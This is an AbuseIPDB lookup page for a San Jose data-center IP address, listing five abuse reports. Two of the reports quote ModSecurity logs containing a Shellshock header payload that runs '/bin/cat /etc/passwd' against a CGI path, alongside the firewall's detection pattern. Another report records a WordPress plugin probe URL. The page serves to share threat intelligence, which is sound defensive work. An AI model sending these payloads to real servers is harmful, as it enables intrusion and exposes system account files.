AbuseIPDB » 142.111.1.38
142.111.1.38 was found in our database!
This IP was reported 5 times. Confidence of
Abuse
is 0%: ?
| ISP |
Ace Data Centers II, L.L.C.
|
| Usage Type |
Data Center/Web Hosting/Transit
|
| ASN |
AS18779
|
| Hostname(s) |
142-111-1-38.ips.acedatacenter.com
|
| Domain Name |
acedatacenter.com
|
| Country |
๐บ๐ธ
United States of America
|
| City |
San Jose, California
|
IP info including ISP, Usage Type, and Location provided
by IPInfo. Updated weekly.
IP Abuse Reports for 142.111.1.38:
This IP address has been reported a total of
5
times from
4 distinct
sources.
142.111.1.38 was first reported on
, and the most recent report was
.
Old Reports:
The most recent abuse report for this IP address is from
. It is possible that this IP is no longer involved in abusive activities.
| Reporter |
IoA Timestamp (UTC)
|
Comment |
Categories |
|
|
๐บ๐ธ
TPI-Abuse
|
|
(mod_security) mod_security (id:221260) triggered by 142.111.1.38 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:221260) triggered by 142.111.1.38 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Dec 27 01:36:11.701263 2024] [security2:error] [pid 23753:tid 23760] [client 142.111.1.38:39573] [client 142.111.1.38] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||webdisk.kettlehill.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "webdisk.kettlehill.com"] [uri "/cgi-bin/status"] [unique_id "Z25K2-1hrc_zKlQ4F2XUpgAAAAU"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
|
Brute-Force
Bad Web Bot
Web App Attack
|
|
|
๐ฉ๐ช
ps-center
|
|
SS1: Web Attack GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1
|
Web Spam
Hacking
Bad Web Bot
Web App Attack
|
|
|
๐ฉ๐ช
Alejandro Docasar
|
|
|
Web App Attack
|
|
|
Anonymous
|
|
| A web attack returned code 200 (success).
|
Hacking
SQL Injection
Web App Attack
|
|
|
๐บ๐ธ
TPI-Abuse
|
|
(mod_security) mod_security (id:221260) triggered by 142.111.1.38 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:221260) triggered by 142.111.1.38 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Sep 26 20:09:18.613710 2024] [security2:error] [pid 23767:tid 23781] [client 142.111.1.38:49263] [client 142.111.1.38] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||cpcalendars.kettlehill.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcalendars.kettlehill.com"] [uri "/cgi-bin/status"] [unique_id "ZvX3rj0cz003ZLU3i9NvFgAAAAw"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
|
Brute-Force
Bad Web Bot
Web App Attack
|
|
Showing 1 to
5
of 5 reports
Think this IP has been falsely reported? You may request to have the associated
reports reviewed and removed.
Request Takedown ๐ฉ
Recently Reported IPs: